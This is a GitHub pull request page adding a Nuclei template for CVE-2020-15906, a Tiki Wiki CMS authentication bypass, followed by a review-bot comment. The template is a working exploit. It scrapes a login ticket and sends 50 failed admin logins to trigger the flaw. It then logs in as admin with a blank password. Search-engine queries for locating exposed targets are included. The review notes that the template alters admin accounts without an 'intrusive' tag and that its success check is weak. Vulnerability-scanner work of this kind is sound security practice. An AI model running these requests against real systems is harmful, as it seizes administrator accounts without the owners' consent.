Merge pull request #10577 from nukunga/CVE-2020-15906
Added CVE-2020-15906 Template
DhiyaneshGeek authored Dec 23, 2024
2 parents 3683742 + c4de8db commit 84fef8f
Showing 1 changed file with 154 additions and 0 deletions.
154 changes: 154 additions & 0 deletions http/cves/2020/CVE-2020-15906.yaml
@@ -0,0 +1,154 @@
id: CVE-2020-15906

info:
name: Tiki Wiki CMS GroupWare - Authentication Bypass
author: JeonSungHyun[nukunga],gy741,oIfloraIo,nechyo,harksu
severity: critical
description: |
tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.
reference:
- https://packetstormsecurity.com/files/159663/Tiki-Wiki-CMS-Groupware-21.1-Authentication-Bypass.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-15906
- https://github.com/Z0fhack/Goby_POC
- https://github.com/bakery312/Vulhub-Reproduce
- https://github.com/20142995/Goby
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-15906
cwe-id: CWE-307
epss-score: 0.02136
epss-percentile: 0.88924
cpe: cpe:2.3:a:tiki:tiki:*:*:*:*:*:*:*:*
metadata:
vendor: tiki
product: tiki
shodan-query: title:"Tiki Wiki CMS"
fofa-query: title="Tiki Wiki CMS"
google-query: intitle:"Tiki Wiki CMS
tags: packetstorm,cve,cve2020,tiki,wiki,auth-bypass

http:
- raw:
- |
GET /tiki-login_scr.php HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: ticket1
internal: true
group: 1
regex:
- 'class="ticket" name="ticket" value="(.*)"'

- raw:
- |
POST /tiki-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}/tiki-login_scr.php
ticket={{ticket1}}&user=admin&pass={{attempt}}&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n
payloads:
attempt:
- nkQ0yYzgF5Er
- P5UdGflH48W3
- xFq7vKNLmhZp
- 8zKtGnh4dW5R
- CfXp2VbQz8Er
- Lh3K6vPzM9Xn
- bG4RxHpY2MdQ
- 7zNtKh3WqF5L
- Y8rQ2GpLx9Kn
- C7KzLmP5X9Vh
- v3LdX8GmQ5Kn
- W4NzX6PqL3Ft
- Q5GhY2VrX7Jk
- r9KdL4PhY6Gm
- 8XjVq5LhZ2Kr
- L5WnQ9KzY8Pr
- M2XdL5GrY9Kh
- N6YzP8WkL5Xt
- G7JqX5VbM2Kp
- H4PrX8LkY6Gm
- J5LhY2VqX9Kr
- 8GrX5NqL2KhY
- K4WnY9PzM8Xt
- Q2XkL5PrY8Vh
- 9JhL4VqX5GrM
- N2XdY5PqL9Kh
- W4LhY8KzM5Xt
- G5JqX2VrY9Kp
- H9PrL5XkY2Gm
- L8WnX5KzY9Pr
- M4XkY2LqV5Gt
- N5XdL9PqY8Kr
- P8XnL5VrY2Kh
- Q4JqX9LhY5Gr
- V7LkX5PrY2Gt
- L2WnY9KzX8Pr
- M9XdL5PqY4Kh
- N8LhY2VqX5Gr
- Q7XkL5PrY9Gm
- X4LhY8WnM5Kp
- G2JqL5VrY9Kt
- H7PrX8KzY2Gm
- J4LhY5VqX9Kr
- N9XkY2LqP5Gt
- W8LhY5PrX2Kz
- G4JqL5XkY9Vr
- P5WnY2KzL8Gt
- M7XkY9LhP2Gr
- Q2JqL5VrY8Kh
- 2JqL5VrY8Kh
attack: batteringram
threads: 50

- raw:
- |
GET /tiki-login_scr.php HTTP/1.1
Host: {{Hostname}}
- |
POST /tiki-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}/tiki-login.php
ticket={{ticket2}}&user=admin&pass=&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n
extractors:
- type: regex
part: body_1
name: ticket2
internal: true
group: 1
regex:
- 'class="ticket" name="ticket" value="(.*)"'

- raw:
- |
GET /tiki-index.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: or
matchers:
- type: word
part: body
words:
- "System Menu"
- "Home"
- "Search"
- "Wiki"
- "File Galleries"
- "Settings"
condition: and

- type: word
words:
- "Show on admin log-in"
- "Tiki Setup"
condition: and
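
Review bot: The `tags` line in `info` lacks `intrusive`, although the second request block submits 50 failed logins for `user=admin` and the third then posts `pass=` empty, so a run against a vulnerable host changes the admin account's state instead of only observing it; add `intrusive` to the tags so the template can be excluded by tag on production scans. In the final block, `matchers-condition: or` lets the first matcher decide on its own, and its words ("Home", "Search", "Wiki", "File Galleries") are generic navigation labels checked against the body of `GET /tiki-index.php` with no status check and no assertion on the response to the blank-password POST, so a match does not by itself show that the login succeeded; consider requiring a marker that is only rendered for a logged-in admin, combined with a status matcher, and setting `part: body` explicitly on the second matcher. Smaller points: `google-query: intitle:"Tiki Wiki CMS` is missing its closing quote, the last payload `2JqL5VrY8Kh` looks like a truncated copy of the entry before it, and the ticket regex `value="(.*)"` is greedy and would be safer as a capture of non-quote characters.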
